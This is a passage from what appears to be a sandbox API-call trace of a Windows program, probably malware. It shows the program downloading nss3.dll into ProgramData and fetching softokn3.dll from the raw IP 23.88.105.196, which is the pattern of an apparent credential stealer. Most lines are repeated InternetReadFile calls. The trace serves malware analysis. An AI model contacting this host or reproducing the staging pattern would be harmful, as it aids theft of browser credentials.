lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.109] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a5f90, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a5f90*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.109] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a6378, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a6378*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.109] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a6760, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a6760*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.109] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a6b48, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a6b48*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.109] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a6f30, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a6f30*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.110] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a7318, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a7318*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.110] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a7700, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a7700*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.110] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a7ae8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a7ae8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.110] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a7ed0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a7ed0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.110] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a82b8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a82b8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.111] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a86a0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a86a0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.111] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a8a88, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a8a88*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.111] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a8e70, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a8e70*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.111] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a9258, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a9258*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.111] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a9640, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a9640*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.111] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a9a28, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a9a28*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.111] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a9e10, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a9e10*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.112] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39aa1f8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39aa1f8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.112] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39aa5e0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39aa5e0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.112] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39aa9c8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39aa9c8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.112] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39aadb0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39aadb0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.112] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39ab198, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39ab198*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.112] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39ab580, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39ab580*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.112] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39ab968, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39ab968*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.113] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39abd50, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39abd50*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.113] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39ac138, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39ac138*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.113] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39ac520, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39ac520*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.113] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39ac908, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39ac908*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.664] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x1d, lpBuffer=0x19f54c, lpdwBufferLength=0x19f504, lpdwIndex=0x0 | out: lpBuffer=0x19f54c, lpdwBufferLength=0x19f504, lpdwIndex=0x0) returned 0 [0107.664] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0107.665] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0107.665] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0107.665] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1068 | out: hHeap=0x29a0000) returned 1 [0107.665] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1040 | out: hHeap=0x29a0000) returned 1 [0107.665] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x29a1040 [0107.665] CreateFileA (lpFileName="C:\\ProgramData\\\\nss3.dll" (normalized: "c:\\programdata\\nss3.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28 [0107.665] WriteFile (in: hFile=0x28, lpBuffer=0x3cab020*, nNumberOfBytesToWrite=0x1303d0, lpNumberOfBytesWritten=0x19f6e0, lpOverlapped=0x0 | out: lpBuffer=0x3cab020*, lpNumberOfBytesWritten=0x19f6e0*=0x1303d0, lpOverlapped=0x0) returned 1 [0107.712] CloseHandle (hObject=0x28) returned 1 [0107.746] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1040 | out: hHeap=0x29a0000) returned 1 [0107.746] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x29a1040 [0107.746] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x29a1068 [0107.746] GetLastError () returned 0x0 [0107.746] SetLastError (dwErrCode=0x0) [0107.747] InternetOpenA (lpszAgent="", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0107.747] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x41, lpBuffer=0x19f684, dwBufferLength=0x4) returned 1 [0107.747] InternetConnectA (hInternet=0xcc0004, lpszServerName="23.88.105.196", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008 [0107.747] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/softokn3.dll", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x400000, dwContext=0x1) returned 0xcc000c [0107.747] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a11c0 [0107.747] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1", dwHeadersLength=0x7d, dwModifiers=0x20000000) returned 1 [0107.747] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Language: ru-RU,ru;q=0.9,en;q=0.8", dwHeadersLength=0x28, dwModifiers=0x20000000) returned 1 [0107.747] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1", dwHeadersLength=0x32, dwModifiers=0x20000000) returned 1 [0107.747] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0", dwHeadersLength=0x37, dwModifiers=0x20000000) returned 1 [0107.747] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a11c0 | out: hHeap=0x29a0000) returned 1 [0107.747] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0107.815] InternetSetFilePointer (in: hFile=0xcc000c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0, dwContext=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.815] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cab020, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cab020*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.817] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cab408, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cab408*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.817] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cab7f0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cab7f0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.817] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cabbd8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cabbd8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.817] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cabfc0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cabfc0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.817] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cac3a8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cac3a8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.817] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cac790, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cac790*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.818] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cacb78, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cacb78*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.818] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cacf60, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cacf60*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.818] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cad348, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cad348*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.818] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cad730, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cad730*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.818] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cadb18, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cadb18*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.818] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cadf00, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cadf00*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.819] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cae2e8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cae2e8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.819] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cae6d0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cae6d0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.819] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3caeab8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3caeab8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.819] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3caeea0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3caeea0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.819] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3caf288, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3caf288*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.819] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3caf670, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3caf670*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.819] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cafa58, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cafa58*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.820] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cafe40, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cafe40*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.820] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb0228, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb0228*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.820] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb0610, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb0610*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.820] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb09f8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb09f8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.820] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb0de0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb0de0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.820] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb11c8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb11c8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.821] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb15b0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb15b0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.821] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb1998, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb1998*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.821] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb1d80, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb1d80*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.821] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb2168, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb2168*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.821] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb2550, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb2550*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.821] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb2938, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb2938*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.821] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb2d20, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb2d20*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.822] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb3108, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb3108*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.822] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb34f0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb34f0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.822] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb38d8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb38d8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.822] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb3cc0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb3cc0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.822] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb40a8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb40a8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.822] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb4490, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb4490*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.822] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb4878, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb4878*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.823] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb4c60, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb4c60*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.823] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb5048, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb5048*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.823] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb5430, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb5430*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.823] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb5818, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb5818*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.823] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb5c00, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb5c00*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.823] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb5fe8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb5fe8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.823] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb63d0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb63d0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.824] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb67b8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb67b8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.824] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb6ba0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb6ba0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.824] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb6f88, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb6f88*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.824] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb7370, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb7370*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.824] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb7758, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb7758*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.824] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb7b40, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb7b40*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.824] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb7f28, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb7f28*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.825] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb8310, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb8310*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.825] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb86f8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb86f8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.825] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb8ae0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb8ae0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.825] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb8ec8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb8ec8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.825] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb92b0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb92b0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.826] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb9698, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb9698*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.826] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb9a80, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb9a80*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.826] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb9e68, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb9e68*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.826] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cba250, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cba250*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.826] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cba638, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cba638*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.826] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cbaa20, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cbaa20*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.826] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cbae08, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cbae08*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.827] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cbb1f0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cbb1f0*, 